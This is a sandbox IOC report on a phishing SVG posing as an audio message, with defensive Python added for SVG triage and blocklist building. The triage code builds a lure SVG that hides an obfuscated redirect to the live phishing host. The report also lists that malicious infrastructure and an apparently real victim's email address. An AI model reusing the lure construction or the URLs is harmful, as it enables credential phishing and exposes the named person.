IOC Report
Jazzsol Audio_Msg.svg


Files

File Path | Type | Category | Malicious
Jazzsol Audio_Msg.svg | SVG Scalable Vector Graphics image | initial sample | malicious
Chrome Cache Entry: 100 | HTML document, ASCII text, with very long lines (52013), with CRLF line terminators | downloaded |
Chrome Cache Entry: 101 | SVG Scalable Vector Graphics image | dropped |
Chrome Cache Entry: 102 | RIFF (little-endian) data, Web/P image | dropped |
Chrome Cache Entry: 103 | SVG Scalable Vector Graphics image | dropped |
Chrome Cache Entry: 104 | HTML document, ASCII text, with very long lines (17089), with CRLF line terminators | downloaded |
Chrome Cache Entry: 105 | RIFF (little-endian) data, Web/P image | downloaded |
Chrome Cache Entry: 106 | ASCII text, with very long lines (48316), with no line terminators | downloaded |
Chrome Cache Entry: 107 | PNG image data, 148 x 85, 8-bit colormap, non-interlaced | downloaded |
Chrome Cache Entry: 108 | SVG Scalable Vector Graphics image | dropped |
Chrome Cache Entry: 109 | RIFF (little-endian) data, Web/P image | downloaded |
Chrome Cache Entry: 110 | SVG Scalable Vector Graphics image | dropped |
Chrome Cache Entry: 111 | PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced | dropped |
Chrome Cache Entry: 112 | Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators | downloaded |
Chrome Cache Entry: 113 | RIFF (little-endian) data, Web/P image | downloaded |
Chrome Cache Entry: 114 | ASCII text, with very long lines (26765), with no line terminators | downloaded |
Chrome Cache Entry: 115 | Web Open Font Format (Version 2), TrueType, length 93276, version 1.0 | downloaded |
Chrome Cache Entry: 116 | RIFF (little-endian) data, Web/P image | dropped |
Chrome Cache Entry: 117 | Web Open Font Format (Version 2), TrueType, length 28000, version 1.66 | downloaded |
Chrome Cache Entry: 118 | Web Open Font Format, TrueType, length 35970, version 1.0 | downloaded |
Chrome Cache Entry: 119 | RIFF (little-endian) data, Web/P image | dropped |
Chrome Cache Entry: 120 | PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced | downloaded |
Chrome Cache Entry: 121 | PNG image data, 148 x 85, 8-bit colormap, non-interlaced | dropped |
Chrome Cache Entry: 122 | RIFF (little-endian) data, Web/P image | downloaded |
Chrome Cache Entry: 123 | SVG Scalable Vector Graphics image | downloaded |
Chrome Cache Entry: 124 | very short file (no magic) | dropped |
Chrome Cache Entry: 125 | ASCII text, with no line terminators | downloaded |
Chrome Cache Entry: 80 | SVG Scalable Vector Graphics image | downloaded |
Chrome Cache Entry: 81 | ASCII text, with CRLF line terminators | downloaded |
Chrome Cache Entry: 82 | Web Open Font Format (Version 2), TrueType, length 28584, version 1.66 | downloaded |
Chrome Cache Entry: 83 | RIFF (little-endian) data, Web/P image | dropped |
Chrome Cache Entry: 84 | RIFF (little-endian) data, Web/P image | downloaded |
Chrome Cache Entry: 85 | SVG Scalable Vector Graphics image | downloaded |
Chrome Cache Entry: 86 | SVG Scalable Vector Graphics image | dropped |
Chrome Cache Entry: 87 | ASCII text, with very long lines (65447) | downloaded |
Chrome Cache Entry: 88 | SVG Scalable Vector Graphics image | downloaded |
Chrome Cache Entry: 89 | ASCII text, with very long lines (10450) | downloaded |
Chrome Cache Entry: 90 | very short file (no magic) | downloaded |
Chrome Cache Entry: 91 | ASCII text, with no line terminators | downloaded |
Chrome Cache Entry: 92 | ASCII text, with very long lines (51734) | downloaded |
Chrome Cache Entry: 93 | RIFF (little-endian) data, Web/P image | downloaded |
Chrome Cache Entry: 94 | RIFF (little-endian) data, Web/P image | dropped |
Chrome Cache Entry: 95 | Web Open Font Format, TrueType, length 36696, version 1.0 | downloaded |
Chrome Cache Entry: 96 | ASCII text, with very long lines (10017) | downloaded |
Chrome Cache Entry: 97 | SVG Scalable Vector Graphics image | downloaded |
Chrome Cache Entry: 98 | Web Open Font Format (Version 2), TrueType, length 43596, version 1.0 | downloaded |
Chrome Cache Entry: 99 | RIFF (little-endian) data, Web/P image | dropped |
37 further files are not included in this export.

Processes

Path | Cmdline | Malicious
C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" |
C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2152,i,15750090068326536515,15019451711460223245,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3 |
C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Jazzsol Audio_Msg.svg" |
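The third process line is the whole attack surface: the .svg was opened directly by chrome.exe, so Chrome rendered it as a standalone XML document with scripting enabled (an SVG shown through an img tag gets no script execution). The report does not reproduce the file's source, so the following is an added triage example, not the analysed sample and not the sandbox vendor's code. It parses an SVG and flags the primitives that turn an "image" into a web page: script elements, on* event handlers, foreignObject/iframe/embed/object, javascript:/data: hrefs, animation elements that retarget href at runtime, outbound anchors, and long base64 runs inside scripts, which it decodes to see whether they hide a URL. SAMPLE_SVG is a constructed lure that redirects to the zsj.gamnfztl.ru path seen in the URLs table with a placeholder victim address; that redirect mechanism is an assumption, not something the report shows.

```python
"""Static triage of an SVG attachment for active content (added example, not from the report).

The report shows chrome.exe opening "Jazzsol Audio_Msg.svg" and then fetching
https://zsj.gamnfztl.ru/aT2Qm/#<victim address>, but does not reproduce the SVG's
source. SAMPLE_SVG is a constructed lure using the primitives such files rely on;
the redirect mechanism is assumed, not observed.
"""
import base64
import re
import xml.etree.ElementTree as ET  # for untrusted input in production, use defusedxml.ElementTree

XLINK_NS = "http://www.w3.org/1999/xlink"
# An image never legitimately needs these elements; each can run or embed arbitrary content.
ACTIVE_TAGS = {"script", "foreignObject", "iframe", "embed", "object", "handler"}
# Animation elements can retarget a link at runtime: <set attributeName="href" to="javascript:..."/>
ANIMATION_TAGS = {"set", "animate"}
URI_ATTRS = {"href", "{%s}href" % XLINK_NS}
DANGEROUS_SCHEME = re.compile(r"^\s*(javascript|data|vbscript):", re.I)
EXTERNAL_URL = re.compile(r"https?://[^\s'\"<>]+", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on qualified names."""
    return tag.rsplit("}", 1)[-1]


def _decoded_payload_hint(text):
    """Decode long base64 runs inside script text and report what they hide, if recognisable."""
    for blob in B64_BLOB.findall(text):
        core = blob.rstrip("=")
        try:
            decoded = base64.b64decode(core + "=" * (-len(core) % 4)).decode("utf-8", "replace")
        except ValueError:
            continue
        url = EXTERNAL_URL.search(decoded)
        if url:
            return "base64 blob decodes to URL %s" % url.group(0)
        if re.search(r"location|<script|document\.write", decoded, re.I):
            return "base64 blob decodes to script/redirect code"
    return None


def triage_svg(svg_bytes):
    """Return (severity, detail) findings; an empty list means no active content was found."""
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        # Browsers reject malformed XML in .svg files, so this is more likely evasion than an image.
        return [("high", "unparseable SVG: %s" % exc)]
    findings = []
    for el in root.iter():
        name = _local(el.tag)
        if name in ACTIVE_TAGS:
            findings.append(("high", "<%s> element present" % name))
            if name == "script":
                hint = _decoded_payload_hint("".join(el.itertext()))
                if hint:
                    findings.append(("high", hint))
        if name in ANIMATION_TAGS and el.get("attributeName", "").split(":")[-1] == "href":
            findings.append(("high", "<%s> retargets href at runtime" % name))
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.lower().startswith("on"):
                findings.append(("high", "<%s %s> event handler" % (name, aname)))
            if attr in URI_ATTRS:
                if DANGEROUS_SCHEME.match(value):
                    scheme = value.split(":", 1)[0].strip().lower()
                    findings.append(("high", "<%s> href uses %s: scheme" % (name, scheme)))
                elif name == "a" and EXTERNAL_URL.match(value):
                    findings.append(("medium", "outbound link to %s" % value))
    return findings


# Constructed sample: a fake "voice message" image whose script decodes and runs a redirect.
_HIDDEN_JS = (
    "var target = 'https://zsj.gamnfztl.ru/aT2Qm/#' + 'victim@example.com';"
    "/* padding so the blob is as long as a real obfuscated payload would be */"
    "window.location.replace(target);"
)
_B64 = base64.b64encode(_HIDDEN_JS.encode()).decode()
SAMPLE_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="%s" width="300" height="80">'
    '<rect width="300" height="80" fill="#0b5cab"/>'
    '<a xlink:href="https://zsj.gamnfztl.ru/aT2Qm/">'
    '<text x="20" y="45" fill="white">Audio message (0:42) - click to play</text></a>'
    '<script type="text/javascript">eval(atob("%s"));</script>'
    "</svg>" % (XLINK_NS, _B64)
).encode()
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10"><circle cx="5" cy="5" r="4"/></svg>'

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("lure", SAMPLE_SVG)):
        print(label, triage_svg(doc) or "clean")
```

Run against the real file, any "high" finding is enough to quarantine: a genuine image has no reason to carry a script element, an event handler or a foreignObject. The base64 decoding step matters because the first thing these lures do is hide the redirect target from string-matching gateways; it is a heuristic, not a deobfuscator, and nested or XOR-encoded payloads still need dynamic analysis like the sandbox run above.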

URLs

Name | IP | Malicious
https://zsj.gamnfztl.ru/aT2Qm/ | 104.21.32.1 | malicious
https://zsj.gamnfztl.ru/lkyjwphwipbrshfwsqvnwklpolvctsaddgu2swnfw?WNKEBWEJFMOTKLFTWQS | | malicious
https://zsj.gamnfztl.ru/abBd4coPek7Vrs6qpgh23 | 104.21.32.1 |
https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 | 18.164.124.110 |
https://olr31hzyv8aluvblganmmiwdojbb4l3jikidtbavxfjfs5pmvcmcn.caspianxw.es/lncteuojmrodrytseemzgpuKDAIYCFPQXSZOAGPZNDEZBTOWRXZYPDVVZQHLBMpq7UZygw3g8GdeO34NYwx40 | 104.21.112.1 |
https://zsj.gamnfztl.ru/aT2Qm/#Mavery.moore@jazzsol.com | |
https://zsj.gamnfztl.ru/weYNKvdCVZyzSPWb49Sm7m | 104.21.32.1 |
https://code.jquery.com/jquery-3.6.0.min.js | 151.101.66.137 |
https://zsj.gamnfztl.ru/favicon.ico | 104.21.32.1 |
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js | 104.17.24.14 |
https://zsj.gamnfztl.ru/efQfEFbBsA1PWjqjC2AsB3Sf3dRFflrh48dPkl3viW8WDARjIzdLtY2l8Xc590150 | 104.21.32.1 |
https://olr31hzyv8aluvblganmmiwdojbb4l3jikidtbavxfjfs5pmvcmcn.caspianxw.es/lncteuojmrodrytseemzgpuKDAIYCFPQXSZOAGPZNDEZBTOWRXZYPDVVZQHLBM12jvBQfcXFekV78xC5op44 | 104.21.112.1 |
https://zsj.gamnfztl.ru/ijV2sMHmHlYU6sScs3cNcduHhH5jc9fLdixgY52he78162 | 104.21.32.1 |
https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css | 18.164.124.110 |
https://zsj.gamnfztl.ru/sttp9YLQTb0kBgoRyDVkLkm41He23tAEUHREaBoUhPEYXGDCh4ftmnKFGSR5aRz37QbiBO3av59LmmaI08PGLQCtYbgh259 | 104.21.32.1 |
https://zsj.gamnfztl.ru/56iBh9wYpPv2hLE61mp9Ipgij7NZ7aJmNLtZJ89110 | 104.21.32.1 |
https://zsj.gamnfztl.ru/ghWnOkFleiFQVUIN2Rokx0mnV6jktMYiINcrOcdA5ygj12205 | 104.21.32.1 |
https://zsj.gamnfztl.ru/mnM6Ws9omfLxH5gBqh9docIE0yIP8Sho1qHJCINn6klPQrkstcz7hFCBoq7Kuv220 | 104.21.32.1 |
https://zsj.gamnfztl.ru/GDSherpa-regular.woff | 104.21.32.1 |
https://zsj.gamnfztl.ru/GDSherpa-vf.woff2 | 104.21.32.1 |
https://olr31hzyv8aluvblganmmiwdojbb4l3jikidtbavxfjfs5pmvcmcn.caspianxw.es/lncteuojmrodrytseemzgpuKDAIYCFPQXSZOAGPZNDEZBTOWRXZYPDVVZQHLBMyzqrxCoLQ78wxIEmCqr42 | 104.21.112.1 |
https://zsj.gamnfztl.ru/GDSherpa-regular.woff2 | 104.21.32.1 |
https://olr31hzyv8aluvblganmmiwdojbb4l3jikidtbavxfjfs5pmvcmcn.caspianxw.es/lncteuojmrodrytseemzgpuKDAIYCFPQXSZOAGPZNDEZBTOWRXZYPDVVZQHLBMyzJOKqtI38q56usIzCZop50 | 104.21.112.1 |
https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css | 18.164.124.110 |
https://a.nel.cloudflare.com/report/v4?s=KTpfwK24z8Pb1yyl8APrUZDrV%2BeJOYpy%2FIN6nGS91334RuP96y2Xfvp8gWB9E0T1HSfF6mSZLe95KdHfetYz1raG09C1FNnTceAbgt3gOUFeD0XfwAcc4qiQzbYYlVb%2BY%2FKv | 35.190.80.1 |
https://zsj.gamnfztl.ru/yz3x3iFQeyzkifPtuQhN76NJOop7WHl7Lgij6SjopLj2ga90176 | 104.21.32.1 |
https://github.com/fent) | unknown |
https://zsj.gamnfztl.ru/GDSherpa-vf2.woff2 | 104.21.32.1 |
https://zsj.gamnfztl.ru/12ZJFM0GxFX7pxyj5n8920 | 104.21.32.1 |
https://zsj.gamnfztl.ru/opsc3k2AIfcggTzvk8JgeYPFlmT012TADl8NCXkcgQtzdORQQIycd237 | 104.21.32.1 |
https://zsj.gamnfztl.ru/qrvzEvmaVkT9iUxv3Lmn3ghmNrwhtynu1KfZgx3Lf8Nz45138 | 104.21.32.1 |
https://zsj.gamnfztl.ru/gkRtSUXVo4GMwwPB2wbMA4no4fTwDUtBjLufxydv89EWijA5DsYsxHgnb | 104.21.32.1 |
https://zsj.gamnfztl.ru/GDSherpa-bold.woff | 104.21.32.1 |
https://k9ia.nmpjkg.ru/chai!yimom9g | 104.21.64.1 |
https://zsj.gamnfztl.ru/kldBL4zcpsIGA3RQCE16rvuDk67NRU89NKlVQcuAKOHEZKqFVXUpKwzab225 | 104.21.32.1 |
https://www.etsy.com | unknown |
https://get.geojs.io/v1/ip/geo.json | 172.67.70.233 |
https://zsj.gamnfztl.ru/kfTYoY9zp6MlR0oOcv4avShQqN3UHLvwqI3DINlldnbOZsdfq | 104.21.32.1 |
https://zsj.gamnfztl.ru/rshUXrcuwMcELYpsglH3R1srubjQneijev9aHyrn7AFS5ivHN3uKDYrmNcd198 | 104.21.32.1 |
https://aadcdn.msauthimages.net/dbd5a2dd-gn-5drtokny-zptvcmh7aynavltkuhd9z2gvx9val7y/logintenantbranding/0/bannerlogo?ts=637825606459016657 | 23.209.72.31 |
https://zsj.gamnfztl.ru/uvWvCCAu7xUYPr7WbScGqrUSw0brtaCJjM12127 | 104.21.32.1 |
https://zsj.gamnfztl.ru/GDSherpa-bold.woff2 | 104.21.32.1 |
32 further URLs are not included in this export.

Domains

Name | IP | Malicious
zsj.gamnfztl.ru | 104.21.32.1 | malicious
a.nel.cloudflare.com | 35.190.80.1 |
e329293.dscd.akamaiedge.net | 23.209.72.31 |
code.jquery.com | 151.101.66.137 |
cdnjs.cloudflare.com | 104.17.24.14 |
github.com | 140.82.112.3 |
olr31hzyv8aluvblganmmiwdojbb4l3jikidtbavxfjfs5pmvcmcn.caspianxw.es | 104.21.112.1 |
get.geojs.io | 172.67.70.233 |
www.google.com | 142.250.81.228 |
k9ia.nmpjkg.ru | 104.21.64.1 |
d19d360lklgih4.cloudfront.net | 18.164.124.110 |
objects.githubusercontent.com | 185.199.111.133 |
aadcdn.msauthimages.net | unknown |
ok4static.oktacdn.com | unknown |
4 further domains are not included in this export.

IPs

IP | Domain | Country | Malicious
104.21.32.1 | zsj.gamnfztl.ru | United States | malicious
104.17.24.14 | cdnjs.cloudflare.com | United States |
140.82.112.3 | github.com | United States |
104.21.64.1 | k9ia.nmpjkg.ru | United States |
192.168.2.6 | unknown | unknown |
142.250.81.228 | www.google.com | United States |
185.199.111.133 | objects.githubusercontent.com | Netherlands |
18.164.124.110 | d19d360lklgih4.cloudfront.net | United States |
104.21.112.1 | olr31hzyv8aluvblganmmiwdojbb4l3jikidtbavxfjfs5pmvcmcn.caspianxw.es | United States |
192.168.2.13 | unknown | unknown |
192.168.2.23 | unknown | unknown |
104.21.96.1 | unknown | United States |
172.67.70.233 | get.geojs.io | United States |
151.101.66.137 | code.jquery.com | United States |
18.164.124.11 | unknown | United States |
35.190.80.1 | a.nel.cloudflare.com | United States |
23.209.72.31 | e329293.dscd.akamaiedge.net | United States |
7 further IPs are not included in this export.
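Every address the lure's own hosts resolved to (104.21.32.1 for zsj.gamnfztl.ru, 104.21.64.1 for k9ia.nmpjkg.ru, 104.21.112.1 for the caspianxw.es host) sits inside Cloudflare's published anycast ranges, as do 104.17.24.14 and 172.67.70.233. Those addresses are shared with a very large number of unrelated Cloudflare-fronted sites, so blocking them causes collateral damage and does not stop the operator, who can re-point the hostname in minutes. The durable pivot is the hostname. The following added example (not part of the sandbox report) turns rows transcribed from the URLs table into a host blocklist, keeps an IP only when the host is not CDN-fronted, separates the legitimate assets the page loads to look like an Okta/Microsoft sign-in (jQuery, crypto-js, oktacdn, msauthimages, geojs) into a context list, and calls out hosts that are in the chain but were not flagged by the sandbox. The Cloudflare range list is the vendor's published IPv4 set; the benign-host set is this editor's judgement from the tables above.

```python
"""Host-centric indicator extraction for the URLs table (added example, not from the report).

Every IP the lure's own hosts resolved to (104.21.32.1, 104.21.64.1, 104.21.112.1) is
Cloudflare anycast space shared by unrelated tenants, so the hostname is the pivot and an
IP is recorded only when the host is not fronted by a shared CDN.
"""
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

# Cloudflare's published IPv4 ranges (https://www.cloudflare.com/ips-v4/), treated as shared infrastructure.
CLOUDFLARE_V4 = [ipaddress.ip_network(n) for n in (
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
)]

# Legitimate hosts the phishing page loads so it looks like a real Okta / Microsoft sign-in.
# They are context for the analyst, not indicators: blocking them breaks genuine logins.
KNOWN_BENIGN_HOSTS = {
    "code.jquery.com", "cdnjs.cloudflare.com", "ok4static.oktacdn.com",
    "aadcdn.msauthimages.net", "a.nel.cloudflare.com", "get.geojs.io",
    "github.com", "objects.githubusercontent.com", "www.google.com", "www.etsy.com",
}


def _parse_ip(text):
    """Return an address object, or None for 'unknown' / empty cells in the IP column."""
    try:
        return ipaddress.ip_address(text)
    except ValueError:
        return None


def is_shared_cdn(ip):
    """True if ip is a Cloudflare anycast address (shared by unrelated tenants)."""
    addr = _parse_ip(ip)
    return addr is not None and any(addr in net for net in CLOUDFLARE_V4)


def build_indicators(url_rows):
    """url_rows: (url, ip or None, flagged_by_sandbox) tuples as in the URLs table above."""
    hosts = defaultdict(lambda: {"flagged": False, "ips": set(), "cdn": False})
    for url, ip, flagged in url_rows:
        host = urlsplit(url).hostname
        if not host:
            continue
        rec = hosts[host]
        rec["flagged"] = rec["flagged"] or flagged
        if ip and _parse_ip(ip):
            if is_shared_cdn(ip):
                rec["cdn"] = True
            else:
                rec["ips"].add(ip)
    result = {"block_hosts": [], "needs_review": [], "cdn_fronted": [], "block_ips": set(), "context_hosts": []}
    for host, rec in sorted(hosts.items()):
        if host in KNOWN_BENIGN_HOSTS:
            result["context_hosts"].append(host)
            continue
        result["block_hosts"].append(host)
        if not rec["flagged"]:
            result["needs_review"].append(host)  # in the chain, but the sandbox did not flag it
        if rec["cdn"] and not rec["ips"]:
            result["cdn_fronted"].append(host)   # only shared CDN addresses seen: an IP block is pointless
        result["block_ips"] |= rec["ips"]
    result["block_ips"] = sorted(result["block_ips"])
    return result


# Rows transcribed from the URLs table above (url, ip, flagged); a representative subset.
REPORT_URLS = [
    ("https://zsj.gamnfztl.ru/aT2Qm/", "104.21.32.1", True),
    ("https://zsj.gamnfztl.ru/lkyjwphwipbrshfwsqvnwklpolvctsaddgu2swnfw?WNKEBWEJFMOTKLFTWQS", None, True),
    ("https://olr31hzyv8aluvblganmmiwdojbb4l3jikidtbavxfjfs5pmvcmcn.caspianxw.es/lncteuojmrodrytseemzgpuKDAIYCFPQXSZOAGPZNDEZBTOWRXZYPDVVZQHLBMpq7UZygw3g8GdeO34NYwx40", "104.21.112.1", False),
    ("https://k9ia.nmpjkg.ru/chai!yimom9g", "104.21.64.1", False),
    ("https://code.jquery.com/jquery-3.6.0.min.js", "151.101.66.137", False),
    ("https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js", "104.17.24.14", False),
    ("https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css", "18.164.124.110", False),
    ("https://aadcdn.msauthimages.net/dbd5a2dd-gn-5drtokny-zptvcmh7aynavltkuhd9z2gvx9val7y/logintenantbranding/0/bannerlogo?ts=637825606459016657", "23.209.72.31", False),
    ("https://get.geojs.io/v1/ip/geo.json", "172.67.70.233", False),
    ("https://github.com/fent)", "unknown", False),
]

if __name__ == "__main__":
    for key, value in build_indicators(REPORT_URLS).items():
        print(key, value)
```

Two things fall out of the run. First, all three lure hosts land in cdn_fronted with an empty block_ips, which is the caveat the IPs table needs. Second, the caspianxw.es and nmpjkg.ru hosts end up in needs_review: the sandbox flagged only zsj.gamnfztl.ru, yet both were contacted from the lure and carry the same random-label pattern, so a blocklist built purely from the "malicious" column misses them. One further point for detection engineering: the victim identifier travels in the URL fragment (#Mavery.moore@jazzsol.com), which the browser never sends to the server, so it will not appear in proxy logs, NEL reports or the phishing host's own access logs; it is recoverable only from the endpoint (browser history, the DOM snapshots below).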

DOM / HTML

URL | Malicious
https://zsj.gamnfztl.ru/aT2Qm/#Mavery.moore@jazzsol.com | malicious
https://zsj.gamnfztl.ru/lkyjwphwipbrshfwsqvnwklpolvctsaddgu2swnfw?WNKEBWEJFMOTKLFTWQS | malicious
https://zsj.gamnfztl.ru/lkyjwphwipbrshfwsqvnwklpolvctsaddgu2swnfw?WNKEBWEJFMOTKLFTWQS | malicious
https://zsj.gamnfztl.ru/lkyjwphwipbrshfwsqvnwklpolvctsaddgu2swnfw?WNKEBWEJFMOTKLFTWQS | malicious
https://zsj.gamnfztl.ru/lkyjwphwipbrshfwsqvnwklpolvctsaddgu2swnfw?WNKEBWEJFMOTKLFTWQS | malicious
https://zsj.gamnfztl.ru/lkyjwphwipbrshfwsqvnwklpolvctsaddgu2swnfw?WNKEBWEJFMOTKLFTWQS | malicious
https://zsj.gamnfztl.ru/aT2Qm/#Mavery.moore@jazzsol.com |